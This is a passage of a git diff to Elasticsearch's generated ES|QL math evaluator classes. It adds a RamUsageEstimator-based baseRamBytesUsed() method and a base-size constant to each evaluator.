BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java index 32233fbc24d04..7887f020ea0b5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CeilDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CeilDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CeilDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java index 4685359679c2f..1473587b2dd2a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CopySignDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator magnitude; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += magnitude.baseRamBytesUsed(); + baseRamBytesUsed += sign.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock magnitudeBlock, DoubleBlock signBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java index 6a55a742d631c..b875b9d5c02f6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignFloatEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CopySignFloatEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignFloatEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator magnitude; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += magnitude.baseRamBytesUsed(); + baseRamBytesUsed += sign.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public FloatBlock eval(int positionCount, FloatBlock magnitudeBlock, DoubleBlock signBlock) { try(FloatBlock.Builder result = driverContext.blockFactory().newFloatBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java index e9db4a0f12506..023625eb7dc94 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignIntegerEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CopySignIntegerEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignIntegerEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator magnitude; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += magnitude.baseRamBytesUsed(); + baseRamBytesUsed += sign.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock magnitudeBlock, DoubleBlock signBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java index 4afbcedd3842a..ea25c47725d5e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CopySignLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CopySignLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator magnitude; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += magnitude.baseRamBytesUsed(); + baseRamBytesUsed += sign.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock magnitudeBlock, DoubleBlock signBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java index 5c854d91e9aa8..a25578c375bef 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java index 8baec8554bb9a..95e6cba70f7d6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CoshEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CoshEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoshEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java index 6b7fa6df9798e..20b010085ad50 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ExpDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java index 9a46ca17081a0..65af3c3108abb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ExpIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java index 38dcd454cfb38..f2367984f4754 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ExpLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java index 57f4b53ce0ba1..bc675f3caae83 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ExpUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ExpUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ExpUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java index 41fd18c464367..d7bc6f5b1a4b4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/FloorDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class FloorDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(FloorDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java index fed6a8becea4b..d632205efac2f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/HypotEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class HypotEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(HypotEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator n1; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += n1.baseRamBytesUsed(); + baseRamBytesUsed += n2.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock n1Block, DoubleBlock n2Block) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java index ca6f38e573cdf..5150744659d2c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10DoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class Log10DoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10DoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java index bb0963750e4ac..eb3f1f74b018f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10IntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class Log10IntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10IntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java index 88f518cbe2654..ac6c702f6e467 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10LongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class Log10LongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10LongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java index ab2ebdd4f2ec8..1ea14290aa98e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Log10UnsignedLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class Log10UnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Log10UnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java index 2cdbb295126d9..7ad7a1d4414bf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogConstantEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LogConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LogConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator value; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += value.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valueBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java index 50917b21add4d..ab7705c2dcf79 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/LogEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import 